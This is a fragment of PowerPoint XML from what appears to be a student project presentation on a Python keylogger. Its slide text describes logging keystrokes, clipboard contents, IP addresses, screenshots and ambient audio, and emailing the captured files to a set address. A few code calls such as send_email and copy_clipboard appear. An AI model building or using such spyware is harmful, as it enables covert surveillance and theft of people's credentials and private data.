              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>        screenshot()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send_email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>screenshot_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>file_path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> + extend + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>screenshot_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>toaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>copy_clipboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>()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sz="9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305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2169</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>308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Office Theme</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Presentation Outline</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Introduction </vt:lpstr>
      <vt:lpstr>Objectives</vt:lpstr>
      <vt:lpstr>System Architecture/ Ideation Map </vt:lpstr>
      <vt:lpstr>Project Implementation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr> Sample Snapshot  STEP 1: Run the file keylogger.py and start clicking on any keys on the  keyboard. The entered keys are shown in the output terminal  </vt:lpstr>
      <vt:lpstr>STEP 2: After the successful compilation of the code, it will generate a file called key_log.txt. Then click on the file and it will show the generated output after keylogging  </vt:lpstr>
      <vt:lpstr> STEP 3: It also generate a clipboard data which you have copied before. All of these contents are logged in a text file   </vt:lpstr>
      <vt:lpstr> STEP 4: It shows our system information data such as Public IP address and Private IP address, Host Name, Machine and System   </vt:lpstr>
      <vt:lpstr> STEP 5: It took a screenshot of the system screen, when the keylogger starts executing    </vt:lpstr>
      <vt:lpstr>  STEP 6: It records the audio of surroundings and save it in an audio.wav file. We can specify the timing of audio recording    </vt:lpstr>
      <vt:lpstr>  STEP 7: It send the screenshot and keylog file to the given mail address     </vt:lpstr>
      <vt:lpstr>  STEP 8: Finally, all the generated files are listed below    </vt:lpstr>
      <vt:lpstr>Results and Discussion</vt:lpstr>
      <vt:lpstr> Conclusion </vt:lpstr>
      <vt:lpstr>References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pulagam amarnath</dc:creator>
  <cp:lastModifiedBy>Mohammed</cp:lastModifiedBy>
  <cp:revision>28</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-12T15:53:51Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-11T07:38:08Z</dcterms:modified>
</cp:coreProperties>
</file>